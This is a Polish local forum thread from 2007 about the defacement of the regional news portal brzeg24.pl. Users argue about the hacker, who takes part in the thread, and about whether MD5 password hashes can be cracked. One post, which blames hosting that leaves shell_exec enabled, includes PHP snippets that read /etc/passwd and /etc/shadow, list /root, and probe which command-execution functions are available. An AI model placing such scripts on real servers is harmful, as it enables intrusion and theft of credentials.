Forum Brzeg on
Regulamin Kalendarz Szukaj Album Rejestracja Zaloguj

MegaExpert

Portal | Strona Główna » Ogólne » Ciekawe Linki » zhakowane http://brzeg24.pl/ Poprzedni temat :: Następny temat
zhakowane http://brzeg24.pl/
Autor Wiadomość
yasiu 
Główny nadzorca



Wiek: 40
Dołączył: 13 Kwi 2005

UP 416 / UP 127


Skąd: Michałowice / Brzeg
Wysłany: 2007-07-29, 14:02   
Hasła są zapisane w MD5 więc wyciek nic nie da, gdyż rozkodowanie md5 trochę trwa ( nie mówię że nie jest możliwe ).

Swoją drogą zawsze zastanawiało mnie po co hakerzy niszczą czyjąś pracę.
0 UP 0 DOWN
 
red_ag 

Wiek: 114
Dołączył: 29 Lip 2007

UP 0 / UP 0



Wysłany: 2007-07-29, 14:13   
Nic nie zniszczone - http://brzeg24.pl/index_stary.php

Czyste MD5 to teraz nie problem.
0 UP 0 DOWN
 
Pan_Pasztet 



Wiek: 36
Dołączył: 10 Maj 2005

UP 1 / UP 0


Skąd: Brzeg :)
Wysłany: 2007-07-29, 14:17   
red_ag, wez zhakuj fotkę ;) albo wp ;) wtedy bede mial do ciebie respekt ;)
0 UP 0 DOWN
 
qBK 


Wiek: 35
Dołączył: 14 Gru 2006

UP 0 / UP 0



Wysłany: 2007-07-29, 14:18   
yasiu napisał/a:
Hasła są zapisane w MD5 więc wyciek nic nie da, gdyż rozkodowanie md5 trochę trwa ( nie mówię że nie jest możliwe).


Standardowe MD5 ma już 16 lat, to dość długo jak na tego typu algorytm. Niestety są już nawet serwisy online które odwracają MD5 (oczywiście nie każde, ale zbiory są potężne), więc sugerowałbym zmianę haseł :) Generalnie to ja staram się od czasu do czasu zmieniać hasła wszędzie gdzie się da i do forów używać innych niż do ważniejszych kont, takich jak poczta, nie mówiąc już oczywiście o banku, gdzie hasło powinno być bardzo długie i absolutnie unikalne...

[edit] no właśnie, spóźniłem się :)
Ostatnio zmieniony przez qBK 2007-07-29, 14:18, w całości zmieniany 1 raz  
0 UP 0 DOWN
 
red_ag 

Wiek: 114
Dołączył: 29 Lip 2007

UP 0 / UP 0



Wysłany: 2007-07-29, 14:59   
pasztet007 napisał/a:
red_ag, wez zhakuj fotkę ;) albo wp ;) wtedy bede mial do ciebie respekt ;)


Nie oczekuję, żebyś mnie szanował, bo sam Cię nie szanuję i mam to za przeproszeniem gdzieś co o mnie myślisz.
0 UP 0 DOWN
 
blaster 



Zaproszone osoby: 10
Wiek: 39
Dołączył: 26 Kwi 2006

UP 138 / UP 192


Skąd: Brzeg
Wysłany: 2007-07-29, 15:03   
hahahaha fotka to dla neigo zbyt duża robota więc nawet sie lamer za nią nie bierze żeby porażki nie zaliczyć
0 UP 0 DOWN
 
bekamsobie 


Wiek: 42
Dołączył: 21 Kwi 2006

UP 6 / UP 0


Skąd: Brzeg
Wysłany: 2007-07-29, 15:04   
Napisz chociaż co miał na celu twój atak.
Pokazanie twórcom dziur w ich serwisie?
Zemstę?
Czy po prostu chciałeś się sprawdzić?
0 UP 0 DOWN
 
Pan_Pasztet 



Wiek: 36
Dołączył: 10 Maj 2005

UP 1 / UP 0


Skąd: Brzeg :)
Wysłany: 2007-07-29, 15:15   
red_ag napisał/a:
pasztet007 napisał/a:
red_ag, wez zhakuj fotkę ;) albo wp ;) wtedy bede mial do ciebie respekt ;)


Nie oczekuję, żebyś mnie szanował, bo sam Cię nie szanuję i mam to za przeproszeniem gdzieś co o mnie myślisz.


ja i tak nie mam do ciebie szacunku;) zgadzam się z przedmówca
bekamsobie napisał/a:
Napisz chociaż co miał na celu twój atak.
Pokazanie twórcom dziur w ich serwisie?
Zemstę?
Czy po prostu chciałeś się sprawdzi



czy poprostu nie mogles juz przejsc sapera i dlatego za coś innego się zabrales??:)
0 UP 0 DOWN
 
red_ag 

Wiek: 114
Dołączył: 29 Lip 2007

UP 0 / UP 0



Wysłany: 2007-07-29, 15:20   
blaster: gardzę takimi ludźmi jak Ty.

pasztet007 napisał/a:
Napisz chociaż co miał na celu twój atak.
Pokazanie twórcom dziur w ich serwisie?
Zemstę?
Czy po prostu chciałeś się sprawdzi


Odp. A
0 UP 0 DOWN
 
yashin 


Wiek: 35
Dołączył: 27 Lut 2007

UP 0 / UP 0



Wysłany: 2007-07-29, 18:28   
yasiu napisał/a:
Hasła są zapisane w MD5 więc wyciek nic nie da

Mylisz się Yasiu, rozkodowania MD5 to jest max kilkanaście minut roboty przy dobrym szczęściu, są już do tego specjalne programy które to rozkodowują. Mi się wydaje, że red_ag użył jakiegoś exploita. Forum też nie jest zabardzo zabezpieczone.
0 UP 0 DOWN
 
mamrow 



Wiek: 35
Dołączył: 05 Lut 2006

UP 0 / UP 0



Wysłany: 2007-07-30, 14:21   
Po części jest to wina systemu jaki jest używany na brzeg24.pl ( w tym wypadku to chyba była Joomla ale nie pamiętam ponieważ nie było stopki ) a po części wina konfiguracji serwera NetArt. Podstawowym błędem jest włączenie funkcji shell_exec i exec na serwerach NetArt, które potem wykorzystują tacy ludzie jak red_ag. Oczywiście jest możliwość ich wyłączenie jednak to zależy od szczęścia na jakiego konsultanta trafimy ;] otóż niektórzy z nich twierdzą, że wyżej wymienione funkcje są właczone w celu globalnego bezpieczeństwa całej struktury Safe mode co w mojej opinii jest kompletnym nonsensem ;] ale to moje zdanie, niektórzy uważają inaczej czego im gratuluje.

A tak między nami red_ag wszystko fajnie, elegancki deface (szkoda że bez obrazka) jednak zastanawia mnie jedna rzecz, dlaczego po takich atakach nie wysyłacie właścicielowi serwisu BugLog'a systemu jaki jest używany przez daną osobę, bądź aplikacji która jest przyczyną włamania, po co masz pozwalać swojej konkurencji włamywać się jeszcze raz na ten sam serwis. Pomyśl, będzie to czyniło Cię wyjątkowym zważywszy na to, że będziesz jedyną osoba jaka włamała się na Regionalny Portal Brzeg24.pl/eu ;]

Kilka bardzo prostych przykładów jak można wykorzystać shell_exec:

1.Zapisujemy plik z poniższym kodem w wybranym katalogu, a ten wyświetla nam liste plików oraz folderów ( przy użyciu rozwiniętej aplikacji "włamywacz" ma możliwość dostępu do każdego katalogu i pliku na serwerze )
Kod:
<?php
$output = shell_exec('ls -lart');
echo "<pre>$output</pre>";
?>


2. Bardzo ciekawa rzecz jednak nie zawsze działa, lepiej nie bede opisywał:
Kod:
<?
$output = shell_exec("cat /etc/passwd|wc -l");
echo(nl2br($output));
$output = shell_exec("cat /etc/shadow");
echo(nl2br($output));
$output = shell_exec("uname -a");
echo(nl2br($output));
$output = shell_exec("ls /root");
echo(nl2br($output));
?>


Poprzez bardzo prosty kod możemy sprawdzić czy na naszym serwerze jest włączona funkcja shell_exec bądź exec, a także wiele innych typu proc_open, popen ( :D )

Oto on:
Kod:
<?php
if(shell_exec('echo lol'))
{
echo('Funckcja shell_exec dziala ');
}
else
{
echo("shell exec nie dziala");
}
if(exec('echo lol'))
{
echo('exec dziala');
}
else
{
echo('exec nie dziala');
}
if(popen('echo lol'))
{
echo('popen dziala');
}
else
{
echo('popen nie dziala');
}
if(proc_open('echo lol','r'))
{
echo("proc open dziala");
}
else
{
echo("proc open nie dziela");
}
if(passthru('echo lol'))
{
echo("passthru dziala");
}
else
{
echo ("passthru nie dziala");
}
?>
<br>
<?php
$d = dir("/tmp/");
while(false !== ($e = $d->read()))
   echo $e . '<br/>';
?>
<br>
<?
$pid = posix_getpid();
echo "Current process ID: $pid\n";
?>


Kompletnie nie rozumiem tego co piszą administratorzy NetArt ( być może się mylę ), przecież we wszystkich dostępnych podręcznikach shell_exec oznaczona jest jako "Ta funkcja jest niedostępna w trybie bezpiecznym"

Tryb Bezpieczny = Safe Mode ? W takim razie gdzie safe_mode na serwerach NetArt?

Pozdrawiam
Ostatnio zmieniony przez mamrow 2007-07-30, 19:46, w całości zmieniany 1 raz  
0 UP 0 DOWN
 
red_ag 

Wiek: 114
Dołączył: 29 Lip 2007

UP 0 / UP 0



Wysłany: 2007-08-05, 15:21   
mamrow: Nast. razem mogę dać obrazek ;) Pobieralnia.org jest Twoja? Tam też miałem hacka, to co pamiętam ;]
0 UP 0 DOWN
 
SPAT 
KONTO_USUNIETE


Wiek: 44
Dołączył: 31 Maj 2007

UP 0 / UP 0



Wysłany: 2007-08-05, 18:27   
zhakuj może stronę prezydent.pl albo coś innego a nie biednych ludzi którzy cieżko nad tym pracują...
0 UP 0 DOWN
 
Vento 
BG



Wiek: 32
Dołączył: 09 Maj 2007

UP 0 / UP 0


Skąd: BrzeG
Wysłany: 2007-08-05, 20:10   
Zacznijmy od tego że ja nie mam szacunku do HAKERÓW!
Potrafią tylko niszczyć! Kumpel dużo potrafi napsocić... ale jednego nie rozumiem...
Bo on chyba myśli że jak coś haknie to będzie lepszy pużniej się tym szczyci :/ Akurat ma czym! Takich ludzi powinno się ścigać :evil:
0 UP 0 DOWN
 
yashin 


Wiek: 35
Dołączył: 27 Lut 2007

UP 0 / UP 0



Wysłany: 2007-08-06, 08:55   
Vento napisał/a:
Zacznijmy od tego że ja nie mam szacunku do HAKERÓW!
Potrafią tylko niszczyć! Kumpel dużo potrafi napsocić... ale jednego nie rozumiem...
Bo on chyba myśli że jak coś haknie to będzie lepszy pużniej się tym szczyci :/ Akurat ma czym! Takich ludzi powinno się ścigać :evil:

Mylisz sie, nie potrafią tylko niszczyć. Haker włamuje się dla poszerzania własnej wiedzy. A podniecanie się typu udało mi się bo przeczytałem na stronie, że tak się da, używanie gotowych exploitów itp. Takich ludzi można nazwać pseudo hakerami. Vento przeczytaj trochę na temat buqtraq i sam się zdziwisz co zwykły internauta potrafi, jeżeli potrafi myśleć. Podam przykład jeśli znasz php to możesz działać cuda po stronie serwera. Wtajemniczeni wiedzą o co chodzi. A co do phpBB by Przemo wykryto już w nim kolejną dziurę. więc polecam poczytanie trochę na kilka tematów.
0 UP 0 DOWN
 
Wyświetl posty z ostatnich:   
Strona Główna » Ogólne » Ciekawe Linki » zhakowane http://brzeg24.pl/
Odpowiedz do tematu
Nie możesz pisać nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach
Nie możesz załączać plików na tym forum
Możesz ściągać załączniki na tym forum
 Dodaj temat do Ulubionych
Wersja do druku

Zobacz posty nieprzeczytane

Skocz do:  

Tagi tematu: httpbrzeg24, pl, zhakowane


Powered by phpBB modified by Przemo © 2003 phpBB Group
Template BMan1Blue v 0.6 modified by Nasedo
Strona wygenerowana w 0,06 sekundy. Zapytań do SQL: 33
Nasze Serwisy:





Informator Miejski:

  • Katalog Firm w Brzegu

    		•